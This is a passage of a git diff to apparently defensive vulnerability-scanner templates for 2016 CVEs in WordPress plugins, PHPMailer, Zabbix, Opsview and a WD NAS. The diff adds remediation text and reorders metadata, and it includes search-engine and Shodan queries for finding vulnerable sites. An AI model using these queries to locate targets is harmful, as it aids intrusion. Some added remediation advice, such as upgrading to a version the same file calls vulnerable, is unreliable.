google-query: inurl:"/wp-content/plugins/hdw-tube" - framework: wordpress vendor: hdw-tube_project product: hdw-tube + framework: wordpress + google-query: inurl:"/wp-content/plugins/hdw-tube" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 67dc5543d7..4371b84c8b 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://wordpress.org/plugins/heat-trackr @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-1000136 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/heat-trackr" - framework: wordpress vendor: heat-trackr_project product: heat-trackr + framework: wordpress + google-query: inurl:"/wp-content/plugins/heat-trackr" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 72055e9cd6..2052c3967a 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - https://wordpress.org/plugins/hero-maps-pro @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000137 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: hero-maps-pro_project product: hero-maps-pro + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin,maps http: diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 48a4894702..1bfabfd267 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=38 - https://wordpress.org/plugins/indexisto @@ -16,14 +18,14 @@ info: cve-id: CVE-2016-1000138 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/indexisto" - framework: wordpress vendor: indexisto_project product: indexisto + framework: wordpress + google-query: inurl:"/wp-content/plugins/indexisto" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index 4304fc656b..3dde7297ce 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://wordpress.org/plugins/infusionsoft @@ -16,14 +18,14 @@ info: cve-id: CVE-2016-1000139 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44589 + cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/infusionsoft" - framework: wordpress vendor: infusionsoft_project product: infusionsoft + framework: wordpress + google-query: inurl:"/wp-content/plugins/infusionsoft" tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index e9813e3aa2..dd66d576c2 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000140 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: new-year-firework_project product: new-year-firework + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 68f595d84c..a402d0e709 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -5,25 +5,25 @@ info: author: daffainfo severity: medium description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + remediation: Upgrade to version 2.0 or higher. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - https://wordpress.org/plugins/page-layout-builder - remediation: Upgrade to version 2.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 epss-score: 0.00142 - cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49194 + cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/page-layout-builder" - framework: wordpress vendor: page-layout-builder_project product: page-layout-builder + framework: wordpress + google-query: inurl:"/wp-content/plugins/page-layout-builder" tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index fd00d420d1..36eee6a756 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary. reference: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 @@ -16,13 +18,13 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* epss-percentile: 0.4117 + cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: parsi-font_project product: parsi-font + framework: wordpress tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve http: diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index d4cc16a8f6..9be75074a0 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://wordpress.org/plugins/photoxhibit @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000143 cwe-id: CWE-79 epss-score: 0.00142 - cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49194 + cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: photoxhibit_project product: photoxhibit + framework: wordpress tags: cve,cve2016,wordpress,wp-plugin,xss http: diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 525303ccda..fcc8cf7c31 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - https://wordpress.org/plugins/pondol-formmail @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000146 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: pondol-formmail_project product: pondol-formmail + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin,mail http: diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index f73450f9a7..166a3e4193 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://wordpress.org/plugins/s3-video @@ -16,13 +18,13 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: s3-video_project product: s3-video + framework: wordpress tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 57281ffc9e..f7de15a6a0 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability. reference: - https://wordpress.org/plugins/simpel-reserveren - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45183 + cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: simpel-reserveren_project product: simpel-reserveren + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 0e587c7a02..d08de79f4e 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - https://wordpress.org/plugins/tidio-form @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000152 cwe-id: CWE-79 epss-score: 0.00249 - cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.6202 + cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: tidio-form_project product: tidio-form + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 2fde9593fc..558c2437af 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000153 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40571 + cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: tidio-gallery_project product: tidio-gallery + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index b264220cc0..8b484e42f2 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49194 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: browserweb product: whizz + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 340692278a..b88f8a5cb9 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WPSOLR plugin (8.7 or higher). reference: - https://wordpress.org/plugins/wpsolr-search-engine - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* epss-percentile: 0.4117 + cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpsolr product: wpsolr-search-engine + framework: wordpress tags: cve,cve2016,wordpress,xss,wp-plugin http: diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 7b6c19823d..29df698550 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + remediation: | + Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability. reference: - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-77 epss-score: 0.97464 - cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* epss-percentile: 0.99934 + cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: phpmailer_project diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index c48c2608d1..9ac460f158 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data. + remediation: | + Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet. reference: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 @@ -17,13 +19,13 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.84853 - cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* epss-percentile: 0.98057 + cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-1074357885 vendor: western_digital product: mycloud_nas + shodan-query: http.favicon.hash:-1074357885 tags: packetstorm,cve,cve2016,rce,oast,wdcloud http: diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index c667d31da8..d4d4761c4b 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. + remediation: | + Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134). reference: - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 - https://nvd.nist.gov/vuln/detail/CVE-2016-10134 @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-10134 cwe-id: CWE-89 epss-score: 0.46819 - cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* epss-percentile: 0.96962 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zabbix diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index 3fbfb5f721..9b56e7bf00 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: high description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + remediation: | + Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.01346 - cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* epss-percentile: 0.84443 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: - max-request: 1 - shodan-query: title:"Opsview" verified: true + max-request: 1 vendor: opsview product: opsview + shodan-query: title:"Opsview" tags: cve,cve2016,opsview,lfi http: diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index ecb69919b3..473f513275 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 @@ -16,8 +18,8 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.00179 - cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* epss-percentile: 0.5437 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 vendor: opsview diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 808685577e..9669b0566a 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability. + remediation: | + Update to the latest version of the plugin to fix the vulnerability. reference: - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c - https://www.exploit-db.com/exploits/39575 @@ -17,14 +19,14 @@ info: cve-id: CVE-2016-10924 cwe-id: CWE-22 epss-score: 0.01574 - cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* epss-percentile: 0.85677 + cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/ebook-download" - framework: wordpress vendor: zedna_ebook_download_project product: zedna_ebook_download + framework: wordpress + google-query: inurl:"/wp-content/plugins/ebook-download" tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan http: diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index f09e66426b..cc540d57f6 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -5,6 +5,8 @@ info: author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + remediation: | + Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2016-10940 cwe-id: CWE-89 epss-score: 0.00841 - cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.79955 + cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 - framework: wordpress vendor: zm-gallery_project product: zm-gallery + framework: wordpress tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated http: diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 652f02935e..2f9c801804 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,0x240x23elu severity: high description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php. + remediation: | + Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability. reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 @@ -16,14 +18,14 @@ info: cve-id: CVE-2016-10956 cwe-id: CWE-20 epss-score: 0.02303 - cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* epss-percentile: 0.88281 + cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 - google-query: inurl:"/wp-content/plugins/mail-masta" - framework: wordpress vendor: mail-masta_project product: mail-masta + framework: wordpress + google-query: inurl:"/wp-content/plugins/mail-masta" tags: cve,cve2016,wordpress,wp-plugin,lfi,mail http: diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 6586f1cad2..23b3234f48 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + remediation: | + Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.01127 - cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* epss-percentile: 0.82845 + cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/wsecure" - framework: wordpress vendor: joomlaserviceprovider product: wsecure + framework: wordpress + google-query: inurl:"/wp-content/plugins/wsecure" tags: cve,cve2016,wordpress,wp-plugin,rce variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 742e74115d..ac9d4beafa 100644 